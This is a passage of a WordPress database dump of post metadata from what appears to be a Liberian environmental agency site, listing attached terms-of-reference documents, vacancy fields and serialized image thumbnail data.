ttachment_metadata','a:1:{s:8:\"filesize\";i:868690;}'),(37470,5545,'_last_editor_used_jetpack','classic-editor'),(37471,5545,'_edit_lock','1754255001:38'),(37472,5545,'_edit_last','38'),(37473,5545,'_wp_page_template','default'),(37474,5545,'closed_date','2025-08-05'),(37475,5545,'owner','EPA/UNDP'),(37476,5545,'vacancy_link',''),(37477,5547,'_wp_attached_file','2025/08/Draft-ToR-Comms-Specialist-Atlas-COP30.docx'),(37478,5547,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:97065;}'),(37479,5549,'_last_editor_used_jetpack','classic-editor'),(37480,5549,'_edit_lock','1754325267:38'),(37481,5549,'_edit_last','38'),(37482,5549,'_wp_page_template','default'),(37483,5549,'closed_date','2025-08-05'),(37484,5549,'owner','EPA/UNDP'),(37485,5549,'vacancy_link',''),(37486,5551,'_wp_attached_file','2025/08/Draft-ToR-Atlas-COP30.docx'),(37487,5551,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:94187;}'),(37488,5553,'_last_editor_used_jetpack','classic-editor'),(37489,5553,'_edit_lock','1754334092:38'),(37490,5553,'_edit_last','38'),(37491,5553,'_wp_page_template','default'),(37492,5553,'closed_date','2025-08-26'),(37493,5553,'owner','EPA'),(37494,5553,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/08/Nationanal-Conservation-Oraganization-for-Mangroves-Restoration-ToR.docx'),(37495,5555,'_wp_attached_file','2025/08/Nationanal-Conservation-Oraganization-for-Mangroves-Restoration-ToR.docx'),(37496,5555,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:83560;}'),(37497,5557,'_last_editor_used_jetpack','classic-editor'),(37498,5557,'_edit_lock','1754515792:38'),(37499,5557,'_edit_last','38'),(37500,5557,'_wp_page_template','default'),(37501,5557,'closed_date','2025-08-28'),(37502,5557,'owner','EPA'),(37503,5557,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/08/ToR-to-develop-ADR-EPA.docx'),(37504,5559,'_wp_attached_file','2025/08/ToR-to-develop-ADR-EPA.docx'),(37505,5559,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:94001;}'),(37506,5561,'_edit_lock','1754898537:38'),(37507,5561,'_last_editor_used_jetpack','block-editor'),(37508,5562,'_wp_attached_file','2025/08/WhatsApp-Image-2025-08-06-at-11.33.33.jpeg'),(37509,5562,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:50:\"2025/08/WhatsApp-Image-2025-08-06-at-11.33.33.jpeg\";s:8:\"filesize\";i:307207;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21638;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-06-at-11.33.33-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161483;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8486;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102484;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-08-06-at-11.33.33-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:295906;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29800;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-08-06-at-11.33.33-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5632;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17112;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43699;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43645;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66566;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-06-at-11.33.33-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154517;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-08-06-at-11.33.33-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:316552;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69412;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.33-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91870;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-06-at-11.33.33-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157920;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37510,5563,'_wp_attached_file','2025/08/WhatsApp-Image-2025-08-06-at-11.33.35.jpeg'),(37511,5563,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:50:\"2025/08/WhatsApp-Image-2025-08-06-at-11.33.35.jpeg\";s:8:\"filesize\";i:364790;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20339;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-06-at-11.33.35-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:176271;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7978;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108056;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-08-06-at-11.33.35-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:339537;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28640;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-08-06-at-11.33.35-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5223;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16373;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44795;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51079;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67994;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-06-at-11.33.35-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164123;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-08-06-at-11.33.35-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:369519;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70636;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-06-at-11.33.35-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100604;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-06-at-11.33.35-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166762;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37514,5561,'_thumbnail_id','5563'),(37515,5561,'_edit_last','38'),(37516,5561,'kava_extra_enable_breadcrumbs','inherit'),(37517,5561,'post_formats',''),(37518,5561,'gallery_tab',''),(37519,5561,'kava_extra_gallery_images',''),(37520,5561,'link_tab',''),(37521,5561,'kava_extra_link',''),(37522,5561,'kava_extra_link_target','_blank'),(37523,5561,'quote_tab',''),(37524,5561,'kava_extra_quote_text',''),(37525,5561,'kava_extra_quote_cite',''),(37526,5561,'audio_tab',''),(37527,5561,'kava_extra_audio',''),(37528,5561,'kava_extra_audio_loop','false'),(37529,5561,'kava_extra_audio_autoplay','false'),(37530,5561,'kava_extra_audio_preload','false'),(37531,5561,'video_tab',''),(37532,5561,'kava_extra_video_type','library'),(37533,5561,'kava_extra_video_library',''),(37534,5561,'kava_extra_video_external',''),(37535,5561,'kava_extra_video_poster',''),(37536,5561,'kava_extra_video_width','770'),(37537,5561,'kava_extra_video_height','480'),(37538,5561,'kava_extra_video_loop','false'),(37539,5561,'kava_extra_video_autoplay','false'),(37540,5561,'kava_extra_video_preload','false'),(37548,5567,'_edit_lock','1755094286:38'),(37549,5567,'_last_editor_used_jetpack','block-editor'),(37552,5567,'_thumbnail_id','5437'),(37553,5567,'_edit_last','38'),(37554,5567,'kava_extra_enable_breadcrumbs','inherit'),(37555,5567,'post_formats',''),(37556,5567,'gallery_tab',''),(37557,5567,'kava_extra_gallery_images',''),(37558,5567,'link_tab',''),(37559,5567,'kava_extra_link',''),(37560,5567,'kava_extra_link_target','_blank'),(37561,5567,'quote_tab',''),(37562,5567,'kava_extra_quote_text',''),(37563,5567,'kava_extra_quote_cite',''),(37564,5567,'audio_tab',''),(37565,5567,'kava_extra_audio',''),(37566,5567,'kava_extra_audio_loop','false'),(37567,5567,'kava_extra_audio_autoplay','false'),(37568,5567,'kava_extra_audio_preload','false'),(37569,5567,'video_tab',''),(37570,5567,'kava_extra_video_type','library'),(37571,5567,'kava_extra_video_library',''),(37572,5567,'kava_extra_video_external',''),(37573,5567,'kava_extra_video_poster',''),(37574,5567,'kava_extra_video_width','770'),(37575,5567,'kava_extra_video_height','480'),(37576,5567,'kava_extra_video_loop','false'),(37577,5567,'kava_extra_video_autoplay','false'),(37578,5567,'kava_extra_video_preload','false'),(37589,5570,'_edit_lock','1755105661:38'),(37590,5570,'_last_editor_used_jetpack','block-editor'),(37591,5571,'_wp_attached_file','2025/08/EPA-RESPOND.jpeg'),(37592,5571,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:1176;s:4:\"file\";s:24:\"2025/08/EPA-RESPOND.jpeg\";s:8:\"filesize\";i:167613;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-276x300.jpeg\";s:5:\"width\";i:276;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23170;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"EPA-RESPOND-940x1024.jpeg\";s:5:\"width\";i:940;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170940;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7242;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-768x836.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:836;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127608;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28646;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:23:\"EPA-RESPOND-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4749;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15848;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43043;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53924;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64929;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:25:\"EPA-RESPOND-1080x650.jpeg\";s:5:\"width\";i:1080;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146992;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:26:\"EPA-RESPOND-1080x1080.jpeg\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192957;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-600x653.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88652;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:24:\"EPA-RESPOND-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94409;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:25:\"EPA-RESPOND-1080x640.jpeg\";s:5:\"width\";i:1080;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146223;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37595,5570,'_thumbnail_id','5490'),(37596,5570,'_edit_last','38'),(37597,5570,'kava_extra_enable_breadcrumbs','inherit'),(37598,5570,'post_formats',''),(37599,5570,'gallery_tab',''),(37600,5570,'kava_extra_gallery_images',''),(37601,5570,'link_tab',''),(37602,5570,'kava_extra_link',''),(37603,5570,'kava_extra_link_target','_blank'),(37604,5570,'quote_tab',''),(37605,5570,'kava_extra_quote_text',''),(37606,5570,'kava_extra_quote_cite',''),(37607,5570,'audio_tab',''),(37608,5570,'kava_extra_audio',''),(37609,5570,'kava_extra_audio_loop','false'),(37610,5570,'kava_extra_audio_autoplay','false'),(37611,5570,'kava_extra_audio_preload','false'),(37612,5570,'video_tab',''),(37613,5570,'kava_extra_video_type','library'),(37614,5570,'kava_extra_video_library',''),(37615,5570,'kava_extra_video_external',''),(37616,5570,'kava_extra_video_poster',''),(37617,5570,'kava_extra_video_width','770'),(37618,5570,'kava_extra_video_height','480'),(37619,5570,'kava_extra_video_loop','false'),(37620,5570,'kava_extra_video_autoplay','false'),(37621,5570,'kava_extra_video_preload','false'),(37628,5573,'_last_editor_used_jetpack','classic-editor'),(37629,5573,'_edit_lock','1761229985:38'),(37630,5573,'_edit_last','38'),(37631,5573,'_wp_page_template','default'),(37632,5573,'closed_date','2025-10-29'),(37633,5573,'owner',''),(37634,5573,'vacancy_link',''),(37635,5575,'_wp_attached_file','2025/08/ToR-harmful-Subsidie.docx'),(37636,5575,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:72944;}'),(37639,5578,'_edit_lock','1755382716:38'),(37640,5578,'_last_editor_used_jetpack','block-editor'),(37641,5579,'_wp_attached_file','2025/08/WhatsApp-Image-2025-08-16-at-11.30.14.jpeg'),(37642,5579,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:50:\"2025/08/WhatsApp-Image-2025-08-16-at-11.30.14.jpeg\";s:8:\"filesize\";i:397851;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25035;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-16-at-11.30.14-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195227;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9713;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121317;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-08-16-at-11.30.14-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:370869;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34468;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-08-16-at-11.30.14-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6457;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19908;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51842;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56025;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77870;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-16-at-11.30.14-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186206;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-08-16-at-11.30.14-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:400887;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81222;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-08-16-at-11.30.14-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112331;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-08-16-at-11.30.14-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193901;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37643,5578,'_thumbnail_id','5579'),(37644,5578,'_edit_last','38'),(37645,5578,'kava_extra_enable_breadcrumbs','inherit'),(37646,5578,'post_formats',''),(37647,5578,'gallery_tab',''),(37648,5578,'kava_extra_gallery_images',''),(37649,5578,'link_tab',''),(37650,5578,'kava_extra_link',''),(37651,5578,'kava_extra_link_target','_blank'),(37652,5578,'quote_tab',''),(37653,5578,'kava_extra_quote_text',''),(37654,5578,'kava_extra_quote_cite',''),(37655,5578,'audio_tab',''),(37656,5578,'kava_extra_audio',''),(37657,5578,'kava_extra_audio_loop','false'),(37658,5578,'kava_extra_audio_autoplay','false'),(37659,5578,'kava_extra_audio_preload','false'),(37660,5578,'video_tab',''),(37661,5578,'kava_extra_video_type','library'),(37662,5578,'kava_extra_video_library',''),(37663,5578,'kava_extra_video_external',''),(37664,5578,'kava_extra_video_poster',''),(37665,5578,'kava_extra_video_width','770'),(37666,5578,'kava_extra_video_height','480'),(37667,5578,'kava_extra_video_loop','false'),(37668,5578,'kava_extra_video_autoplay','false'),(37669,5578,'kava_extra_video_preload','false'),(37676,5582,'_edit_lock','1755665468:38'),(37677,5582,'_last_editor_used_jetpack','block-editor'),(37678,5583,'_wp_attached_file','2025/08/NUGA-PIC.jpeg'),(37679,5583,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1075;s:6:\"height\";i:806;s:4:\"file\";s:21:\"2025/08/NUGA-PIC.jpeg\";s:8:\"filesize\";i:153454;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19784;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"NUGA-PIC-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141897;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7962;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90555;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27033;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"NUGA-PIC-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5617;